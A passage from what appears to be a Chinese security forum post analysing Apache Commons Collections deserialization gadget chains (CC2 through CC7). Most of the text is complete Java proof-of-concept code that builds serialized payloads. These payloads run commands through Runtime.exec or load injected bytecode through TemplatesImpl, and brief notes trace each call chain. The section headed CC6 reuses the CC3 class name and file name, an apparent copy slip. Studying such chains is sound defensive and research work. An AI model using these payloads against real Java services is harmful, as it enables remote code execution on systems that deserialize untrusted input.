  24.         ObjectInputStream ois = new ObjectInputStream(fis);
  25.         ois.readObject();
  26.     }
  27.     public static void main(String[] args) throws NoSuchFieldException, IllegalAccessException, IOException, ClassNotFoundException, NoSuchMethodException, InvocationTargetException, InstantiationException {
  28.         TemplatesImpl templates = new TemplatesImpl();
  29.         Field _name = TemplatesImpl.class.getDeclaredField("_name");
  30.         _name.setAccessible(true);
  31.         _name.set(templates, "1");
  32.         Field _bytecodes = TemplatesImpl.class.getDeclaredField("_bytecodes");
  33.         _bytecodes.setAccessible(true);
  34.         byte[] bytes = Files.readAllBytes(Paths.get("E:\\IDEA\\CC\\untitled\\target\\classes\\org\\example\\Eval.class"));
  35.         byte[][] code = {bytes};
  36.         _bytecodes.set(templates, code);
  37.         Field _tfactory = TemplatesImpl.class.getDeclaredField("_tfactory");
  38.         _tfactory.setAccessible(true);
  39.         _tfactory.set(templates, new TransformerFactoryImpl());
  40.         Field ABSTRACT_TRANSLET = TemplatesImpl.class.getDeclaredField("ABSTRACT_TRANSLET");
  41.         ABSTRACT_TRANSLET.setAccessible(true);
  42.         ABSTRACT_TRANSLET.set(templates, "java.lang.Object");
  43. //        Transformer transformer = templates.newTransformer();
  44.         Transformer[] transformers = new Transformer[]{
  45.                 new ConstantTransformer(templates),
  46.                 new InvokerTransformer("newTransformer", null, null)
  47.         };
  48.         ChainedTransformer chainedTransformer = new ChainedTransformer(transformers);
  49.         HashMap<Object, Object> map = new HashMap<>();
  50.         Map<Object, Object> decorate = LazyMap.decorate(map,  chainedTransformer);
  51.         Class c = Class.forName("sun.reflect.annotation.AnnotationInvocationHandler");
  52.         Constructor constructor = c.getDeclaredConstructor(Class.class, Map.class);
  53.         constructor.setAccessible(true);
  54.         InvocationHandler handler = (InvocationHandler) constructor.newInstance(Target.class, decorate);
  55.         Map newMap = (Map) Proxy.newProxyInstance(LazyMap.class.getClassLoader(), new Class[]{Map.class}, handler);
  56.         Object o = constructor.newInstance(Target.class, newMap);
  57.         serialize(o);
  58.         deserialize("cc3.bin");
  59.     }
  60. }
复制代码
CC6
  1. package org.example;
  2. import com.sun.org.apache.xalan.internal.xsltc.trax.TemplatesImpl;
  3. import com.sun.org.apache.xalan.internal.xsltc.trax.TransformerFactoryImpl;
  4. import org.apache.commons.collections.Transformer;
  5. import org.apache.commons.collections.functors.ChainedTransformer;
  6. import org.apache.commons.collections.functors.ConstantTransformer;
  7. import org.apache.commons.collections.functors.InvokerTransformer;
  8. import org.apache.commons.collections.keyvalue.TiedMapEntry;
  9. import org.apache.commons.collections.map.LazyMap;
  10. import java.io.*;
  11. import java.lang.annotation.Target;
  12. import java.lang.reflect.*;
  13. import java.nio.file.Files;
  14. import java.nio.file.Paths;
  15. import java.util.HashMap;
  16. import java.util.Map;
  17. public class CC3 {
  18.     public static void serialize(Object obj) throws IOException {
  19.         FileOutputStream fos = new FileOutputStream("cc3.bin");
  20.         ObjectOutputStream oos = new ObjectOutputStream(fos);
  21.         oos.writeObject(obj);
  22.     }
  23.     public static void deserialize(String filename) throws IOException, ClassNotFoundException {
  24.         FileInputStream fis = new FileInputStream(filename);
  25.         ObjectInputStream ois = new ObjectInputStream(fis);
  26.         ois.readObject();
  27.     }
  28.     public static void main(String[] args) throws NoSuchFieldException, IllegalAccessException, IOException, ClassNotFoundException, NoSuchMethodException, InvocationTargetException, InstantiationException {
  29.         TemplatesImpl templates = new TemplatesImpl();
  30.         Field _name = TemplatesImpl.class.getDeclaredField("_name");
  31.         _name.setAccessible(true);
  32.         _name.set(templates, "1");
  33.         Field _bytecodes = TemplatesImpl.class.getDeclaredField("_bytecodes");
  34.         _bytecodes.setAccessible(true);
  35.         byte[] bytes = Files.readAllBytes(Paths.get("E:\\IDEA\\CC\\untitled\\target\\classes\\org\\example\\Eval.class"));
  36.         byte[][] code = {bytes};
  37.         _bytecodes.set(templates, code);
  38.         Field _tfactory = TemplatesImpl.class.getDeclaredField("_tfactory");
  39.         _tfactory.setAccessible(true);
  40.         _tfactory.set(templates, new TransformerFactoryImpl());
  41.         Field ABSTRACT_TRANSLET = TemplatesImpl.class.getDeclaredField("ABSTRACT_TRANSLET");
  42.         ABSTRACT_TRANSLET.setAccessible(true);
  43.         ABSTRACT_TRANSLET.set(templates, "java.lang.Object");
  44. //        Transformer transformer = templates.newTransformer();
  45.         Transformer[] transformers = new Transformer[]{
  46.                 new ConstantTransformer(templates),
  47.                 new InvokerTransformer("newTransformer", null, null)
  48.         };
  49.         ChainedTransformer chainedTransformer = new ChainedTransformer(transformers);
  50.         Map<Object, Object> map = new HashMap<>();
  51.         Map<Object, Object> lazymap = LazyMap.decorate(map, new ConstantTransformer(1));
  52.         TiedMapEntry tiedMapEntry = new TiedMapEntry(lazymap, null);
  53.         HashMap<Object, Object> hashMap = new HashMap<>();
  54.         hashMap.put(tiedMapEntry, null);
  55.         map.remove(null);
  56.         Field factory = LazyMap.class.getDeclaredField("factory");
  57.         factory.setAccessible(true);
  58.         factory.set(lazymap, chainedTransformer);
  59.         serialize(hashMap);
  60.         deserialize("cc3.bin");
  61.     }
  62. }
复制代码
收官,分析一下yso的CC3,又有所不同,可以看到它在Transformer[]里调用的是InstantiateTransformer,还引入了TrAXFilter这个类,我们追踪一下

首先TrAXFilter中会调用newTransformer

再看InstantiateTransformer的transform方法,获取构造器,再实例化,刚好可以触发TrAXFilter

  1. package org.example;
  2. import com.sun.org.apache.xalan.internal.xsltc.trax.TemplatesImpl;
  3. import com.sun.org.apache.xalan.internal.xsltc.trax.TrAXFilter;
  4. import com.sun.org.apache.xalan.internal.xsltc.trax.TransformerFactoryImpl;
  5. import org.apache.commons.collections.Transformer;
  6. import org.apache.commons.collections.functors.ChainedTransformer;
  7. import org.apache.commons.collections.functors.ConstantTransformer;
  8. import org.apache.commons.collections.functors.InstantiateTransformer;
  9. import org.apache.commons.collections.functors.InvokerTransformer;
  10. import org.apache.commons.collections.keyvalue.TiedMapEntry;
  11. import org.apache.commons.collections.map.LazyMap;
  12. import javax.xml.transform.Templates;
  13. import java.io.*;
  14. import java.lang.annotation.Target;
  15. import java.lang.reflect.*;
  16. import java.nio.file.Files;
  17. import java.nio.file.Paths;
  18. import java.util.HashMap;
  19. import java.util.Map;
  20. public class cc3 {
  21.     public static void serialize(Object obj) throws IOException {
  22.         FileOutputStream fos = new FileOutputStream("cc3.bin");
  23.         ObjectOutputStream oos = new ObjectOutputStream(fos);
  24.         oos.writeObject(obj);
  25.     }
  26.     public static void deserialize(String filename) throws IOException, ClassNotFoundException {
  27.         FileInputStream fis = new FileInputStream(filename);
  28.         ObjectInputStream ois = new ObjectInputStream(fis);
  29.         ois.readObject();
  30.     }
  31.     public static void main(String[] args) throws NoSuchFieldException, IllegalAccessException, IOException, ClassNotFoundException, NoSuchMethodException, InvocationTargetException, InstantiationException {
  32.         TemplatesImpl templates = new TemplatesImpl();
  33.         Field _name = TemplatesImpl.class.getDeclaredField("_name");
  34.         _name.setAccessible(true);
  35.         _name.set(templates, "1");
  36.         Field _bytecodes = TemplatesImpl.class.getDeclaredField("_bytecodes");
  37.         _bytecodes.setAccessible(true);
  38.         byte[] bytes = Files.readAllBytes(Paths.get("E:\\IDEA\\CC\\untitled\\target\\classes\\org\\example\\Eval.class"));
  39.         byte[][] code = {bytes};
  40.         _bytecodes.set(templates, code);
  41.         Field _tfactory = TemplatesImpl.class.getDeclaredField("_tfactory");
  42.         _tfactory.setAccessible(true);
  43.         _tfactory.set(templates, new TransformerFactoryImpl());
  44.         Field ABSTRACT_TRANSLET = TemplatesImpl.class.getDeclaredField("ABSTRACT_TRANSLET");
  45.         ABSTRACT_TRANSLET.setAccessible(true);
  46.         ABSTRACT_TRANSLET.set(templates, "java.lang.Object");
  47. //        Transformer transformer = templates.newTransformer();
  48.         Transformer[] transformers = new Transformer[]{
  49.                 new ConstantTransformer(TrAXFilter.class),
  50.                 new InstantiateTransformer(new Class[]{Templates.class}, new Object[]{templates})
  51.         };
  52.         ChainedTransformer chainedTransformer = new ChainedTransformer(transformers);
  53.         HashMap<Object, Object> map = new HashMap<>();
  54.         Map<Object, Object> decorate = LazyMap.decorate(map,  chainedTransformer);
  55.         Class c = Class.forName("sun.reflect.annotation.AnnotationInvocationHandler");
  56.         Constructor constructor = c.getDeclaredConstructor(Class.class, Map.class);
  57.         constructor.setAccessible(true);
  58.         InvocationHandler handler = (InvocationHandler) constructor.newInstance(Target.class, decorate);
  59.         Map newMap = (Map) Proxy.newProxyInstance(LazyMap.class.getClassLoader(), new Class[]{Map.class}, handler);
  60.         Object o = constructor.newInstance(Target.class, newMap);
  61.         serialize(o);
  62.         deserialize("cc3.bin");
  63.     }
  64. }
复制代码
CC4

CC4必要commoncollection4的依赖
CC4其实就是CC3的前半部门,在修改了一下后部门的一些操作,不是像CC1,CC6那样使用LazyMap来触发transform了,所以得换别的类,如 TransformingComparator,这是commoncollection4里的类,我们跟进一下,compare这里调用了transform

继续跟进,看哪调用了compare,PriorityQueue类

跟进

继续跟进

完善

构造exp:
  1. package org.example;
  2. import com.sun.org.apache.xalan.internal.xsltc.trax.TemplatesImpl;
  3. import com.sun.org.apache.xalan.internal.xsltc.trax.TrAXFilter;
  4. import com.sun.org.apache.xalan.internal.xsltc.trax.TransformerFactoryImpl;
  5. import org.apache.commons.collections4.Transformer;
  6. import org.apache.commons.collections4.functors.ChainedTransformer;
  7. import org.apache.commons.collections4.functors.ConstantTransformer;
  8. import org.apache.commons.collections4.functors.InstantiateTransformer;
  9. import org.apache.commons.collections4.comparators.TransformingComparator;
  10. import javax.xml.transform.Templates;
  11. import java.io.*;
  12. import java.lang.reflect.Field;
  13. import java.nio.file.Files;
  14. import java.nio.file.Paths;
  15. import java.util.PriorityQueue;
  16. public class cc4 {
  17.     public static void serialize(Object obj) throws IOException {
  18.         FileOutputStream fos = new FileOutputStream("cc4.bin");
  19.         ObjectOutputStream oos = new ObjectOutputStream(fos);
  20.         oos.writeObject(obj);
  21.     }
  22.     public static void deserialize(String filename) throws IOException, ClassNotFoundException {
  23.         FileInputStream fis = new FileInputStream(filename);
  24.         ObjectInputStream ois = new ObjectInputStream(fis);
  25.         ois.readObject();
  26.     }
  27.     public static void main(String[] args) throws NoSuchFieldException, IOException, IllegalAccessException, ClassNotFoundException {
  28.         TemplatesImpl templates = new TemplatesImpl();
  29.         Field _name = TemplatesImpl.class.getDeclaredField("_name");
  30.         _name.setAccessible(true);
  31.         _name.set(templates, "1");
  32.         Field _bytecodes = TemplatesImpl.class.getDeclaredField("_bytecodes");
  33.         _bytecodes.setAccessible(true);
  34.         byte[] bytes = Files.readAllBytes(Paths.get("E:\\IDEA\\CC\\untitled\\target\\classes\\org\\example\\Eval.class"));
  35.         byte[][] code = {bytes};
  36.         _bytecodes.set(templates, code);
  37.         Field _tfactory = TemplatesImpl.class.getDeclaredField("_tfactory");
  38.         _tfactory.setAccessible(true);
  39.         _tfactory.set(templates, new TransformerFactoryImpl());
  40.         Field ABSTRACT_TRANSLET = TemplatesImpl.class.getDeclaredField("ABSTRACT_TRANSLET");
  41.         ABSTRACT_TRANSLET.setAccessible(true);
  42.         ABSTRACT_TRANSLET.set(templates, "java.lang.Object");
  43.         Transformer[] transformers = new Transformer[]{
  44.                 new ConstantTransformer(TrAXFilter.class),
  45.                 new InstantiateTransformer(new Class[]{Templates.class}, new Object[]{templates})
  46.         };
  47.         ChainedTransformer chainedTransformer = new ChainedTransformer(transformers);
  48.         TransformingComparator transformingComparator = new TransformingComparator(new ConstantTransformer(1));
  49.         Field transformer = TransformingComparator.class.getDeclaredField("transformer");
  50.         transformer.setAccessible(true);
  51.         transformer.set(transformingComparator, chainedTransformer);
  52.         PriorityQueue<Object> priorityQueue = new PriorityQueue<>(transformingComparator);
  53.         priorityQueue.add(1);
  54.         priorityQueue.add(2);
  55.         serialize(priorityQueue);
  56.         deserialize("cc4.bin");
  57.     }
  58. }
复制代码

CC2

CC2与CC4不同的地方就是后半些许不同,没有用chainedtrainsform,直接用invokertransformer
直接上poc了,没啥可调试的
  1. package org.example;
  2. import com.sun.org.apache.xalan.internal.xsltc.trax.TemplatesImpl;
  3. import com.sun.org.apache.xalan.internal.xsltc.trax.TransformerFactoryImpl;
  4. import org.apache.commons.collections4.comparators.TransformingComparator;
  5. import org.apache.commons.collections4.functors.ConstantTransformer;
  6. import org.apache.commons.collections4.functors.InvokerTransformer;
  7. import java.io.*;
  8. import java.lang.reflect.Field;
  9. import java.nio.file.Files;
  10. import java.nio.file.Paths;
  11. import java.util.PriorityQueue;
  12. public class cc2 {
  13.     public static void serialize(Object obj) throws IOException {
  14.         FileOutputStream fos = new FileOutputStream("cc2.bin");
  15.         ObjectOutputStream oos = new ObjectOutputStream(fos);
  16.         oos.writeObject(obj);
  17.     }
  18.     public static void deserialize(String filename) throws IOException, ClassNotFoundException {
  19.         FileInputStream fis = new FileInputStream(filename);
  20.         ObjectInputStream ois = new ObjectInputStream(fis);
  21.         ois.readObject();
  22.     }
  23.     public static void main(String[] args) throws NoSuchFieldException, IOException, IllegalAccessException, ClassNotFoundException {
  24.         TemplatesImpl templates = new TemplatesImpl();
  25.         Field _name = TemplatesImpl.class.getDeclaredField("_name");
  26.         _name.setAccessible(true);
  27.         _name.set(templates, "1");
  28.         Field _bytecodes = TemplatesImpl.class.getDeclaredField("_bytecodes");
  29.         _bytecodes.setAccessible(true);
  30.         byte[] bytes = Files.readAllBytes(Paths.get("E:\\IDEA\\CC\\untitled\\target\\classes\\org\\example\\Eval.class"));
  31.         byte[][] code = {bytes};
  32.         _bytecodes.set(templates, code);
  33.         Field _tfactory = TemplatesImpl.class.getDeclaredField("_tfactory");
  34.         _tfactory.setAccessible(true);
  35.         _tfactory.set(templates, new TransformerFactoryImpl());
  36.         Field ABSTRACT_TRANSLET = TemplatesImpl.class.getDeclaredField("ABSTRACT_TRANSLET");
  37.         ABSTRACT_TRANSLET.setAccessible(true);
  38.         ABSTRACT_TRANSLET.set(templates, "java.lang.Object");
  39.         InvokerTransformer invokerTransformer = new InvokerTransformer("newTransformer",new Class[]{},new Object[]{});
  40.         TransformingComparator transformingComparator = new TransformingComparator(new ConstantTransformer(1));
  41.         PriorityQueue<Object> priorityQueue = new PriorityQueue<>(transformingComparator);
  42.         priorityQueue.add(templates);
  43.         priorityQueue.add(2);
  44.         Field transformer = TransformingComparator.class.getDeclaredField("transformer");
  45.         transformer.setAccessible(true);
  46.         transformer.set(transformingComparator, invokerTransformer);
  47.         serialize(priorityQueue);
  48.         deserialize("cc2.bin");
  49.     }
  50. }
复制代码
CC5

CC5就是改了一点点的CC6,看链子,就改了readObject部门,分析一下

触发LazyMap.get换成了toString,这里调用了getValue

继续跟进,BadAttributeValueExpException的readObject调用了toString

这样就可以构造链子了,非常简单
  1. package org.example;
  2. import org.apache.commons.collections.Transformer;
  3. import org.apache.commons.collections.functors.ChainedTransformer;
  4. import org.apache.commons.collections.functors.ConstantTransformer;
  5. import org.apache.commons.collections.functors.InvokerTransformer;
  6. import org.apache.commons.collections.keyvalue.TiedMapEntry;
  7. import org.apache.commons.collections.map.LazyMap;
  8. import javax.management.BadAttributeValueExpException;
  9. import java.io.*;
  10. import java.lang.reflect.Field;
  11. import java.util.HashMap;
  12. import java.util.Map;
  13. public class cc5 {
  14.     public static void serialize(Object obj) throws IOException {
  15.         FileOutputStream fos = new FileOutputStream("cc5.bin");
  16.         ObjectOutputStream oos = new ObjectOutputStream(fos);
  17.         oos.writeObject(obj);
  18.     }
  19.     public static void deserialize(String filename) throws IOException, ClassNotFoundException {
  20.         FileInputStream fis = new FileInputStream(filename);
  21.         ObjectInputStream ois = new ObjectInputStream(fis);
  22.         ois.readObject();
  23.     }
  24.     public static void main(String[] args) throws NoSuchFieldException, IllegalAccessException, IOException, ClassNotFoundException {
  25.         Transformer[] transformers = new Transformer[]{
  26.                 new ConstantTransformer(Runtime.class),
  27.                 new InvokerTransformer("getDeclaredMethod", new Class[]{String.class, Class[].class}, new Object[]{"getRuntime", null}),
  28.                 new InvokerTransformer("invoke", new Class[]{Object.class, Object[].class}, new Object[]{null, null}),
  29.                 new InvokerTransformer("exec", new Class[]{String.class}, new Object[]{"calc"})
  30.         };
  31.         ChainedTransformer chainedTransformer = new ChainedTransformer(transformers);
  32.         Map<Object, Object> map = new HashMap<>();
  33.         Map<Object, Object> lazymap = LazyMap.decorate(map, chainedTransformer);
  34.         TiedMapEntry tiedMapEntry = new TiedMapEntry(lazymap, null);
  35.         BadAttributeValueExpException badAttributeValueExpException = new BadAttributeValueExpException(null);
  36.         Field val = BadAttributeValueExpException.class.getDeclaredField("val");
  37.         val.setAccessible(true);
  38.         val.set(badAttributeValueExpException, tiedMapEntry);
  39.         serialize(badAttributeValueExpException);
  40.         deserialize("cc5.bin");
  41.     }
  42. }
复制代码
CC7

CC7的链子,这里是从LazyMap.get的调用开始修改了

追踪一下,AbstractMap类的equals调用了get

继续追踪equals,AbstractMapDecorator的equals调用了

继续追踪,为什么要用reconstitutionPut?Hashtable里另有很多多少地方都调用了equals

因为它在readObject中被调用了
  1.     private void readObject(ObjectInputStream s)
  2.          throws IOException, ClassNotFoundException
  3.     {
  4.         ObjectInputStream.GetField fields = s.readFields();
  5.         // Read and validate loadFactor (ignore threshold - it will be re-computed)
  6.         float lf = fields.get("loadFactor", 0.75f);
  7.         if (lf <= 0 || Float.isNaN(lf))
  8.             throw new StreamCorruptedException("Illegal load factor: " + lf);
  9.         lf = Math.min(Math.max(0.25f, lf), 4.0f);
  10.         // Read the original length of the array and number of elements
  11.         int origlength = s.readInt();
  12.         int elements = s.readInt();
  13.         // Validate # of elements
  14.         if (elements < 0)
  15.             throw new StreamCorruptedException("Illegal # of Elements: " + elements);
  16.         // Clamp original length to be more than elements / loadFactor
  17.         // (this is the invariant enforced with auto-growth)
  18.         origlength = Math.max(origlength, (int)(elements / lf) + 1);
  19.         // Compute new length with a bit of room 5% + 3 to grow but
  20.         // no larger than the clamped original length.  Make the length
  21.         // odd if it's large enough, this helps distribute the entries.
  22.         // Guard against the length ending up zero, that's not valid.
  23.         int length = (int)((elements + elements / 20) / lf) + 3;
  24.         if (length > elements && (length & 1) == 0)
  25.             length--;
  26.         length = Math.min(length, origlength);
  27.         if (length < 0) { // overflow
  28.             length = origlength;
  29.         }
  30.         // Check Map.Entry[].class since it's the nearest public type to
  31.         // what we're actually creating.
  32.         SharedSecrets.getJavaOISAccess().checkArray(s, Map.Entry[].class, length);
  33.         Hashtable.UnsafeHolder.putLoadFactor(this, lf);
  34.         table = new Entry<?,?>[length];
  35.         threshold = (int)Math.min(length * lf, MAX_ARRAY_SIZE + 1);
  36.         count = 0;
  37.         // Read the number of elements and then all the key/value objects
  38.         for (; elements > 0; elements--) {
  39.             @SuppressWarnings("unchecked")
  40.                 K key = (K)s.readObject();
  41.             @SuppressWarnings("unchecked")
  42.                 V value = (V)s.readObject();
  43.             // sync is eliminated for performance
  44.             reconstitutionPut(table, key, value);
  45.         }
  46.     }
复制代码
这样链子就明了了,构造poc,注意AbstractMapDecorator和AbstractMap都是抽象类,并不能实例化,但是都实现了Map,所以调用equals时是调用lazyMap.equals,找不到往上找就能找到AbstractMap.equals
  1. package org.example;
  2. import org.apache.commons.collections.Transformer;
  3. import org.apache.commons.collections.functors.ChainedTransformer;
  4. import org.apache.commons.collections.functors.ConstantTransformer;
  5. import org.apache.commons.collections.functors.InvokerTransformer;
  6. import org.apache.commons.collections.map.AbstractMapDecorator;
  7. import org.apache.commons.collections.map.LazyMap;
  8. import java.io.*;
  9. import java.lang.reflect.Field;
  10. import java.util.AbstractMap;
  11. import java.util.HashMap;
  12. import java.util.Hashtable;
  13. import java.util.Map;
  14. public class cc7 {
  15.     public static void serialize(Object obj) throws IOException {
  16.         FileOutputStream fos = new FileOutputStream("cc7.bin");
  17.         ObjectOutputStream oos = new ObjectOutputStream(fos);
  18.         oos.writeObject(obj);
  19.     }
  20.     public static void deserialize(String filename) throws IOException, ClassNotFoundException {
  21.         FileInputStream fis = new FileInputStream(filename);
  22.         ObjectInputStream ois = new ObjectInputStream(fis);
  23.         ois.readObject();
  24.     }
  25.     public static void main(String[] args) throws NoSuchFieldException, IllegalAccessException, IOException, ClassNotFoundException {
  26.         Transformer[] transformers = new Transformer[]{
  27.                 new ConstantTransformer(Runtime.class),
  28.                 new InvokerTransformer("getDeclaredMethod", new Class[]{String.class, Class[].class}, new Object[]{"getRuntime", null}),
  29.                 new InvokerTransformer("invoke", new Class[]{Object.class, Object[].class}, new Object[]{null, null}),
  30.                 new InvokerTransformer("exec", new Class[]{String.class}, new Object[]{"calc"})
  31.         };
  32.         ChainedTransformer chainedTransformer = new ChainedTransformer(new Transformer[]{});
  33.         Map<Object, Object> map1 = new HashMap<>();
  34.         Map<Object, Object> map2 = new HashMap<>();
  35.         Map<Object, Object> lazymap1 = LazyMap.decorate(map1, chainedTransformer);
  36.         Map<Object, Object> lazymap2 = LazyMap.decorate(map2, chainedTransformer);
  37.         lazymap1.put("yy", 1);
  38.         lazymap2.put("zZ",1);
  39.         Hashtable hashtable = new Hashtable<>();
  40.         hashtable.put(lazymap1, 1);
  41.         hashtable.put(lazymap2,2);
  42.         Field iTransformers = ChainedTransformer.class.getDeclaredField("iTransformers");
  43.         iTransformers.setAccessible(true);
  44.         iTransformers.set(chainedTransformer, transformers);
  45.         lazymap2.remove("yy");
  46.         serialize(hashtable);
  47.         deserialize("cc7.bin");
  48.     }
  49. }
复制代码
免责声明:如果侵犯了您的权益,请联系站长,我们会及时删除侵权内容,谢谢合作!更多信息从访问主页:qidao123.com:ToB企服之家,中国第一个企服评测及商务社交产业平台。

本帖子中包含更多资源

您需要 登录 才可以下载或查看,没有账号?立即注册

x
回复

使用道具 举报

0 个回复

倒序浏览

快速回复

您需要登录后才可以回帖 登录 or 立即注册

本版积分规则

罪恶克星

金牌会员
这个人很懒什么都没写!
快速回复 返回顶部 返回列表